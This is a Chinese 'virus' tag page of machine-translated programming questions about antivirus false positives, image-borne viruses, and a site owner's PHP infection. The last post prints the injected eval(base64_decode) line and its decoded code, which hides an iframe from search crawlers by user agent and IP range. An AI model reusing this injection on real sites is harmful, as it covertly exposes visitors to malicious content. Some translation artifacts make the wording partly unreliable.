Tag: 病毒

我的程序被avast反病毒拦截

我是一个业余程序员,因为一个大问题而变得绝望和疯狂:我的大多数程序都被avast反病毒拦截,有些则不是,我不明白为什么。 我试图调查得越多,我就越不了解问题所在。 我请求你的帮助,find一个解决scheme,以便我的程序不再被阻止,或者,作为默认,至less有一些强大的线索,可以解释为什么可能是这种情况。 网上已经有很多关于这个话题的话题了。 然而,他们大多只给出一些表面的答案:他们只是解释了反病毒如何与签名和检测启发式一起工作,或者说你只需要在白名单中添加违规应用程序而不询问任何其他问题。 虽然这当然是正确的,但我觉得这是不可接受的答案,因为我仍然留下自己的程序,拒绝工作,没有任何具体的想法开始调查。 首先,阻止我的程序唯一的反病毒是avast 7.x. 没有其他反病毒看到任何不方便运行我的软件。 其次,我自己并没有死心塌地; 它安装在朋友的机器上。 我有Windows 7,他有Windows XP。 我完全确定问题只是avast:当它暂时被禁用,或者如果程序被添加到它的白名单,一切都很好地按预期工作。 三个不同的scheme陷入困境: 一个文本编辑器,旨在取代Windows记事本,同时保持简单,高效和可定制 一个小的业余audio播放器使用非常简单 一个在线游戏平台的客户端程序,目前拥有超过1000个用户 第一个是开源的,如果需要,我可以给出一个可执行文件和源代码的链接。 另外两个是封闭的源码,但可以自由使用,我只能给出一个链接到当前版本的可执行文件。 这三个程序之间唯一明显的共同点就是我作为一个开发人员,编译它们的Windows 7机器,MinGW / GCC编译器系列,它们都是没有任何框架的win32 GUI应用程序(没有MFC,没有WPF,没有QT,WXWidgets或其他;只是纯粹的Win32 / C GUI应用程序) 这是我的观察,虽然到目前为止: 我的文本编辑器的版本1.1,1.2.1和1.3被阻止。 它们是C而不是C ++,已经在unicode模式下用GCC 3.4.5编译,并分布在可移植的zip文件中(通过便携式,我只是表示没有安装程序,也不需要安装) 相同文本编辑器的版本1.4.1不会被阻止。 它已经用GCC 4.7.2编译,仍然在C而不是C ++,仍然在unicode模式下,仍然是一个可移植的zip文件 我的audio播放器的所有版本都被阻止; 他们是在C ++中启用了0xfunction,已经由ANSI模式的GCC 4.7.2编译,分发在可移植的zip文件中 我的游戏1.7.2的当前版本没有被封锁。 它在C中,已经在ANSI模式下用GCC 3.4.5编译,并作为inno-setup 5安装程序分发。 我的游戏的新版本,2.0.0,目前是一个私人testing版,被封锁。 它在C ++中启用了0xfunction,已经在unicode模式下用GCC 4.7.2编译。 我将其与我的私人testing团队分享为私人保pipe箱文件夹中的zip文件 问题是由avast 7.x自动沙箱造成的。 当您尝试启动avast不喜欢的程序时,会发生以下情况: 用户双击或在可执行文件上input […]

病毒如何在图像中存在?

我最近看了一个芬兰互联网安全专家的video。 在第十一分钟左右的时候,他谈到了隐藏在图像中的病毒,并在图像即将显示时执行。 我想知道他们在技术上如何做这样的事情,我的意思是如何执行 病毒 ,什么时候显示图片以及如何使图片不会以某种方式受到损害。 我以为计算机先看扩展名,然后用适当的程序打开它,让程序自行运行(而且我不希望普通的图像查看器能够在自己的内部运行病毒)。 很明显,这不是那样的工作,但没有人问我可以帮助我。 那么,有谁知道他们是如何做到这一点的原则? 非常感谢你。

无意中造成了病毒?

我经常看到这种情况:我用Delphi编写了一个应用程序,当我编译它时,病毒扫描程序告诉我我已经创build了一个病毒,然后立即再次删除可执行文件。 这是讨厌的,但合理的,很容易通过做一个完整的重build,删除* .dcu文件,有时候通过简单的等待来修复。 据我所知,Delphi 6,7,2005和2007发生了这种情况。 赛门铁克,卡巴斯基,迈克菲和NOD32都报告了这些误报。 我知道这是因为Delphi为它的DCU文件添加了时间戳,这些时间戳最终在最终的可执行文件中,显然是一些随机病毒签名的一部分。 我不想禁用病毒扫描程序,即使是单个文件夹或文件。 我并不是真的想要解决scheme,但是我想知道以下几点: 其他编译器也会出现这些误报吗? 这是否也发生在.NET可执行文件? 其他人也注意到与Delphi类似的问题?

如何摆脱像PHP病毒文件的eval-base64_decode?

我的网站(非常大的社区网站)最近感染了病毒。 每个index.php文件都被改变了,所以这些文件的开头php标签被改成了下面这行: <?php eval(base64_decode('ZXJyb+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=')); 当我解码这个,它产生了下面的PHP代码: <?php error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array( array("216.239.32.0","216.239.63.255"), array("64.68.80.0" ,"64.68.87.255" ), array("66.102.0.0", "66.102.15.255"), array("64.233.160.0","64.233.191.255"), array("66.249.64.0", "66.249.95.255"), array("72.14.192.0", "72.14.255.255"), array("209.85.128.0","209.85.255.255"), array("198.108.100.192","198.108.100.207"), array("173.194.0.0","173.194.255.255"), array("216.33.229.144","216.33.229.151"), array("216.33.229.160","216.33.229.167"), array("209.185.108.128","209.185.108.255"), array("216.109.75.80","216.109.75.95"), array("64.68.88.0","64.68.95.255"), array("64.68.64.64","64.68.64.127"), array("64.41.221.192","64.41.221.207"), array("74.125.0.0","74.125.255.255"), array("65.52.0.0","65.55.255.255"), array("74.6.0.0","74.6.255.255"), array("67.195.0.0","67.195.255.255"), array("72.30.0.0","72.30.255.255"), array("38.0.0.0","38.255.255.255") ); $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( […]